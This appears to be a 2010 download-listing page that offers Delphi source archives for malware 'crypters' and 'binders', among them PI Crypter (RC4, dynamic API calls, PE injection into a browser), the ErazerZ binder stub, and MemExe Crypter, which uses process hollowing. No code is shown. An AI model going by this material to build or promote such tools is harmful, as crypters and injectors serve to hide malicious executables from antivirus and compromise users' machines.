
Original self-injecting unit by steve10120: 

The additional builder code in this release is necessary for two reasons: 
  1. To change the imagebase of the stub file to that of the target file. 
  2. To enlarge the last section so it's big enough to cover the SizeOfImage of the target file. 

Author: steve10120 
Compiled: Delphi 2007 

Tested and working environments: Windows XP, Vista, 7. 

Only Delphi source code is included in the archive. 

PI Crypter by Counterstrikewi

posted 24 Aug 2010, 15:47 by Delphi Basics   [ updated 15 Oct 2010, 15:35 ]

PI crypter, coded by Counterstrikewi, is compatible with all executable files. 

Joining Method: Resources 
Encryption: RC4 
Special Features: Most apis are dynamically called; Inject PE to Browser. 

Thank you  
steve10120  
p0ke  
SWiM  
Xash  
ap0calypse  
Rogue  
shapeless  
testest  
abhe  

Friends  
DarkCoderSC  
Slayer616  
who!  
mjrod5  
~Fleck  
Cracksman  
FusioN  
Menace  
Neo  
f0rce  

Only Delphi source code is included in the archive.

ErazerZ Binder - 3.75 KB Stub

posted 17 Aug 2010, 17:23 by Delphi Basics

Delphi Example Binder by ErazerZ 
Date: 3rd May 2006 

Binding.exe - Main Program, the binder 
External Stub.exe - Example of a packed stub, it's 3,75 KB and it works :O 

ErazerZ 


Only Delphi source code is included in the archive.

MemExe Crypter by shapeless

posted 29 Jun 2010, 12:53 by Delphi Basics

This crypter uses a new memory injection technique, pioneered by shapeless where the current process is unmapped to be replaced with the map of a custom PE.
